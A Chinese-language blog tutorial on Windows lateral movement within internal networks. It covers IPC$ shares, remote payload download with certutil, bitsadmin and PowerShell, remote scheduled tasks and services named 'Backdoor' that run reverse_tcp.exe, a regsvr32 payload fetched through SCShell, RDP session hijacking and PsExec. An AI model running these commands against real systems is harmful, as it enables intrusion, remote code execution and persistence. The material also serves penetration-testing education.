<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1.0"/><meta name="author" content="jjjing"/><meta name="copyright" content="jjjing"/><meta name="theme-color" content="#FFB347"/><meta name="format-detection" content="telephone=no"/><meta name="keywords" content="Hexo Theme MEOW"/><meta name="mobile-web-app-capable" content="yes"/><meta name="apple-mobile-web-app-capable" content="yes"/><meta name="apple-touch-fullscreen" content="yes"/><meta name="application-name" content="内网横向移动 | jjjing"/><meta name="apple-mobile-web-app-title" content="内网横向移动 | jjjing"/><meta name="apple-mobile-web-app-status-bar-style" content="#FFB347"/><link rel="canonical" href="https://jinggg1123.github.io/archives/2023/12/27/内网横向移动/"/><meta name="description" content="网络共享Windows网络共享功能，net share命令列出默认开启的网络共享。C$即C盘共享，ADMIN$是系统目录共享。还有一个最重要的IPC$共享。进程间通信（Inter-Process Communication，简称IPC），为了让进程间通信而开放的命名管道。通过用户名密码建立安全的通道进行数据交换。实战中往往建立ipc$连接，因为可以列出远程主机进程、在远程主机创建计划任务或系...">
<meta property="og:type" content="article">
<meta property="og:title" content="内网横向移动 | jjjing">
<meta property="og:url" content="https://jinggg1123.github.io/archives/2023/12/27/%E5%86%85%E7%BD%91%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/index.html">
<meta property="og:site_name" content="jjjing">
<meta property="og:description" content="网络共享Windows网络共享功能，net share命令列出默认开启的网络共享。C$即C盘共享，ADMIN$是系统目录共享。还有一个最重要的IPC$共享。进程间通信（Inter-Process Communication，简称IPC），为了让进程间通信而开放的命名管道。通过用户名密码建立安全的通道进行数据交换。实战中往往建立ipc$连接，因为可以列出远程主机进程、在远程主机创建计划任务或系...">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://jinggg1123.github.io/archives/2023/12/27/%E5%86%85%E7%BD%91%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/assets/images/Hexo-Theme-MEOW.png">
<meta property="article:published_time" content="2023-12-27T07:11:33.000Z">
<meta property="article:modified_time" content="2024-12-08T13:23:39.519Z">
<meta property="article:author" content="jjjing">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://jinggg1123.github.io/archives/2023/12/27/%E5%86%85%E7%BD%91%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/assets/images/Hexo-Theme-MEOW.png"><meta name="robots" content="index,follow"/><meta name="googlebot" content="index,follow"/><meta name="revisit-after" content="1 days"/><title>内网横向移动 | jjjing</title><link rel="shortcut icon" href="/assets/images/Hexo-Theme-MEOW.ico"><link rel="preconnect" href="/assets"/><link rel="preconnect" href="assets"/>
<link rel="stylesheet" href="/css/style.css">

<link rel="stylesheet" href="/css/third-party/dist/APlayer.min.css">
<link rel="prefetch" href="/"/><link rel="prefetch" href="/archives"/><link rel="prefetch" href="/tags"/><meta name="generator" content="Hexo 6.3.0"></head><body bg-style="none"><div class="post-progressbar-container"><div class="post-progressbar"></div></div><header><div id="navbar"><div id="nav-info"><a id="site-icon" href="/" title="主页"><img src="/assets/images/Hexo-Theme-MEOW.png" alt="Logo"/></a><a id="site-name" href="/" title="主页"><div>jjjing</div><img src="/assets/images/svg/uc/uc-home.svg" class="icon noview" alt="Icon"></a></div><div id="nav-menu"></div><div id="nav-function"><div id="menu-btn"><a href="javascript:void(0);" title="打开菜单"><img src="/assets/images/svg/uc/uc-menu.svg" class="icon noview" alt="Icon"></a></div></div></div></header><div id="menu-aside"><div id="menu-aside-container"><div id="menu-aside-info"><a href="/" title="主页"><img src="/assets/images/Hexo-Theme-MEOW.png" alt="Logo"/></a><a href="/" title="主页">jjjing</a></div><hr/></div></div><main><div class="banner"><div class="banner-info"><div class="banner-avatar"><img src="/assets/images/Hexo-Theme-MEOW.png" alt="Avatar"/></div><div class="banner-title">「 MEOW 」</div></div></div><div class="post-container"><div class="post-main"><div class="post-content"><h1 class="post-title">内网横向移动</h1><div class="post-author"><span>作者: jjjing</span></div><div class="post-meta"><div class="post-info"><div class="post-date"><div class="post-pubdate"><img src="/assets/images/svg/ta/ta-pubdate.svg" class="icon noview" alt="Icon"><span>发表于2023-12-27</span></div><div class="post-update"><img src="/assets/images/svg/ta/ta-update.svg" class="icon noview" alt="Icon"><span>更新于2024-12-08</span></div></div><div class="post-read"></div></div><div class="post-attribute"><div class="post-categories"><img src="/assets/images/svg/ta/ta-category.svg" class="icon noview" alt="Icon"><span><a class="post-categories-link" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a></span></div></div></div><div class="post markdown" indent="false"><h2><span id="网络共享">网络共享</span></h2><p>Windows网络共享功能，<code>net share</code>命令列出默认开启的网络共享。<code>C$</code>即C盘共享，<code>ADMIN$</code>是系统目录共享。还有一个最重要的<code>IPC$</code>共享。<br><strong>进程间通信</strong>（Inter-Process Communication，简称<strong>IPC</strong>），为了让进程间通信而开放的命名管道。通过用户名密码建立安全的通道进行数据交换。<br>实战中往往建立ipc$连接，因为可以列出远程主机进程、在远程主机创建计划任务或系统服务……<br>建立<code>IPC$</code>连接条件：远程主机开启了ipc连接，端口139、445开放。</p>
<blockquote>
<p>因为IPC$连接通常通过SMB协议进行，而SMB协议使用TCP端口139和445。</p>
</blockquote>
<h2><span id="文件传输">文件传输</span></h2><p>测试人员往往需要预先制定好文件传输方案，以便在后续操作过程中向目标主机部署攻击载荷或其他文件。<br>1、<strong>文件上传</strong><br>利用跳板机，将 文件 上传 给 目标主机。</p>
<blockquote>
<p>利用方法：IPC连接配合copy命令</p>
</blockquote>
<ol>
<li><p><strong>建立IPC链接</strong>到目标主机</p>
<div class="code-container" code-lang="Powershell"><div class="codebox"><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net use \\<span class="number">192.168</span>.<span class="number">3.21</span>\ipc<span class="variable">$</span> <span class="string">&quot;Admin12345&quot;</span> /user:god.org\administrator</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
</li>
<li><p><strong>拷贝</strong>要执行的命令脚本到目标主机</p>
<div class="code-container" code-lang="Powershell"><div class="codebox"><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">copy</span> <span class="number">5555</span>.exe \\<span class="number">192.168</span>.<span class="number">3.21</span>\c<span class="variable">$</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div></li>
</ol>
<p>2、<strong>文件下载</strong><br>若可以在目标主机上执行命令，则可使用以下方式 直接下载文件。<br>以下是Windows自带的文件下载工具：</p>
<ol>
<li>Certutil（常用）</li>
</ol>
<p>Certutil 是Windows自带的命令行工具，用于管理Windows证书并作为证书服务器的一部分安装。Certutil提供了从网络下载文件的功能。（需要一个web服务器存放要下载的文件。</p>
<div class="code-container" code-lang="Powershell"><div class="codebox"><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">certutil.exe <span class="literal">-urlcache</span> <span class="operator">-split</span> <span class="operator">-f</span> http://<span class="number">192.168</span>.<span class="number">3.22</span>/<span class="number">6666</span>.exe <span class="number">6666</span>.exe</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<ol start="2">
<li>BITSAdmin</li>
</ol>
<p>BITSAdmin用于创建、下载和上传作业，监视其进度。<br>Windows7及以后的系统自带BitsAdmin工具。</p>
<div class="code-container" code-lang="Powershell"><div class="codebox"><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">bitsadmin /transfer test http://<span class="number">192.168</span>.<span class="number">1.1</span>:<span class="number">8000</span>/shell.exe c:\users\public\shell.exe</span><br><span class="line"><span class="comment"># 创建一个名为test的bitsadmin任务，下载shell.exe</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<ol start="3">
<li>PowerShell</li>
</ol>
<p>在Powershell中通过创建WebClient对象来实现文件下载：</p>
<div class="code-container" code-lang="Powershell"><div class="codebox"><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">(<span class="built_in">New-Object</span> Net.WebClient).DownloadFile(<span class="string">&quot;http://192.168.1.1:8000/shell.exe&quot;</span>, <span class="string">&quot;c:\users\public\shell.exe&quot;</span>)</span><br><span class="line">或</span><br><span class="line">powershell <span class="literal">-c</span> <span class="string">&quot;(New-Object Net.WebClient).DownloadFile(&#x27;http://192.168.1.1:8000/shell.exe&#x27;,&#x27;c:\users\public\shell.exe&#x27;)&quot;</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<h2><span id="执行程序或命令">执行程序或命令</span></h2><p>文件传输到目标主机后，可以利用以下方式运行攻击载荷，或者执行其他命令。</p>
<h3><span id="计划任务">计划任务</span></h3><p>1）通过建立的IPC连接，通过copy命令将攻击载荷上传后，在远程主机上创建计划任务，运行攻击载荷，或者执行其他命令，或者将执行的命令的结果保存在文本中用<code>type</code>读取。</p>
<pre><code>  1. `at`命令
</code></pre>
<p>版本要求：&lt;Windows2012<br>建立ipc连接，然后把执行文件copy上去，再使用at命令添加计划任务。</p>
<div class="code-container" code-lang="Powershell"><div class="codebox"><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">at \\<span class="number">10.1</span>.<span class="number">1.1</span>\ <span class="number">11</span>:<span class="number">30</span> C:\hh.bat</span><br><span class="line">at \\<span class="number">10.1</span>.<span class="number">1.1</span>    <span class="number">1</span> /delete	<span class="comment"># 1为计划任务的ID</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<pre><code>  2. `schtasks`命令
</code></pre>
<p>版本要求：&gt;&#x3D;windows2012<br>建立ipc连接，然后把执行文件copy上去，再使用schtasks命令添加计划任务。</p>
<div class="code-container" code-lang="Powershell"><div class="codebox"><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 在10.1.1.1创建任务名为adduser，每天执行的，文件路径为C:\add.bat的任务</span></span><br><span class="line">schtasks /create /s <span class="number">10.1</span>.<span class="number">1.1</span> /ru <span class="string">&quot;SYSTEM&quot;</span> /tn adduser /<span class="built_in">sc</span> DAILY /tr C:\add.bat /F	<span class="comment"># 已建立ipc连接的情况下使用</span></span><br><span class="line">schtasks /create /s <span class="number">10.1</span>.<span class="number">1.1</span> /ru <span class="string">&quot;SYSTEM&quot;</span> /tn adduser /<span class="built_in">sc</span> DAILY /tr C:\add.bat /F /U Administrator /P Admin12345	<span class="comment"># 若没有建立ipc连接，需要手动指定用户密码</span></span><br><span class="line"></span><br><span class="line">schtasks /run /s <span class="number">10.1</span>.<span class="number">1.1</span> /tn adduser /i		<span class="comment"># 立即启动adduser任务</span></span><br><span class="line">schtasks /delete /s <span class="number">10.1</span>.<span class="number">1.1</span> /tn adduser /f	<span class="comment"># 删除adduser任务</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>2）除了ipc连接外，还可使用自行搭建的<strong>SMB匿名服务器</strong>。使用<code>UNC路径</code>代替本地路径，让远程主机直接在搭建的SMB共享中加载并执行攻击载荷。比ipc的好处就是<strong>省去了文件上传</strong>。<br>SMB（文件共享CIFS）搭建：<br>在linux上，可以通过<code>impacket</code>套件里的 <a target="_blank" rel="noopener" href="https://github.com/fortra/impacket/blob/master/impacket/smbserver.py">smbserver.py </a>来搭建smb服务器。</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">mkdir</span> /root/smbshare</span><br><span class="line">python3 smbserver.py mysmb /root/smbshare -smb2support</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>然后执行以下命令，创建计划任务，注意这里使用的是UNC路径，因为没有建立ipc连接，也需要手动指定用户密码。</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks /Create /S 10.1.1.1 /TN Backdoor /SC minute /MO 1 /TR \\192.168.3.15\mysmb\reverse_tcp.exe /RU System /F /U Administrator /P Admin12345</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<p>可以看到以上两种方法都是明文密码，但是我们信息搜集的时候可能会得到hash值，hash值可以使用<code>impacket</code>里的<code>atexec</code>工具进行hash传递。</p>
<h3><span id="系统服务">系统服务</span></h3><p>1、<code>sc</code>命令，创建系统服务，运行指定的程序或命令。</p>
<blockquote>
<p>条件：要有2端主机的管理员权限、ipc连接</p>
</blockquote>
<p>上传攻击载荷后，利用已建立的IPC$连接在远程主机上创建系统服务：</p>
<div class="code-container" code-lang="Powershell"><div class="codebox"><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sc</span> \\<span class="number">10.10</span>.<span class="number">10.19</span> create Backdoor binPath= <span class="string">&quot;cmd.exe /k C:\reverse_tcp.exe&quot;</span>	<span class="comment"># 创建名为Backdoor的服务，服务启动时执行指定命令。注意，= 后面有个空格</span></span><br><span class="line"><span class="built_in">sc</span> \\<span class="number">10.10</span>.<span class="number">10.19</span> <span class="built_in">start</span> Backdoor  	<span class="comment"># 启动服务</span></span><br><span class="line"><span class="built_in">sc</span> \\<span class="number">10.10</span>.<span class="number">10.19</span> delete Backdoor  <span class="comment"># 删除服务</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>2、<code>SCShell</code>工具，是一款利用系统服务的无文件横向移动工具。</p>
<blockquote>
<p>通过<code>ChangeServiceConfigA API</code>修改服务配置，将二进制路径修改为指定的程序或攻击载荷，然后重启服务，执行结束后，服务二进制路径将会恢复为原始路径。</p>
</blockquote>
<p>用MSF启动一个Web Delivery，并生成用于Regsvr32执行的Payload。<br>然后在远程主机上执行：</p>
<div class="code-container" code-lang="Powershell"><div class="codebox"><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">SCShell.exe <span class="number">192.168</span>.<span class="number">197.131</span> XblAuthManager <span class="string">&quot;C:\windows\system32\cmd.exe /c C:\windows\system32\regsvr32.exe /s /n /u /i://your.website/payload.sct scrobj.dll&quot;</span> hack.com administrastor Admin12345 </span><br><span class="line"><span class="comment"># XblAuthManager 是 Xbox Accessory Management Service的服务名</span></span><br><span class="line"><span class="comment"># 格式：</span></span><br><span class="line"><span class="comment">#SCShell.exe &lt;target&gt; &lt;serviceName&gt; &lt;payload&gt; &lt;domain&gt; &lt;username&gt; &lt;password&gt;</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
<h2><span id="rdp远程桌面协议">RDP远程桌面协议</span></h2><p>远程桌面协议RDP，端口TCP 3389<br>可以通过获取的用户凭据，借助代理，通过远程桌面对目标进行实时操作。<br>但可能会把已登录的用户强制退出。<br>1、开启RDP</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">REG ADD <span class="string">&quot;HKLM\System\CurrentControlSet\Control\Lsa&quot;</span> /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>2、RDP Hijacking劫持<br>当多个用户进行登录时，会产生多个会话，我们可以通过已经获取的SYSTEM权限劫持其他用户的RDP会话，在未授权的情况下登入。<br><code>tscon</code>命令可以切换用户会话。正常情况下切换会话需要提供用户密码验证，但是在SYSTEM权限下能完全绕过验证。不验证就能登录，实现未授权登录。</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">query user	<span class="comment"># 查询会话记录</span></span><br><span class="line">tscon &lt;ID&gt;	<span class="comment"># 切换会话，会话id</span></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>3、工具<code>SharpRDP</code><br>提供RDP协议在远程主机执行命令，省去了 内网代理 和 GUI登录。<br>条件：开启远程桌面、防火墙3389开放</p>
<h2><span id="psexec远程管理工具">PsExec远程管理工具</span></h2><p>PsExec是微软官方工具，用来实现Windows远程管理。<br>原理：SMB连接Admin$共享，并释放名为psexesvc.exe的二进制文件，然后注册名字为PSEXESVC的服务。当我们输入远程命令时，会通过PSEXESVC服务启动相应程序执行命令并回显数据。运行结束，PSEXESVC被删除。<br>条件：开启Admin$共享，445端口(SMB)开放</p>
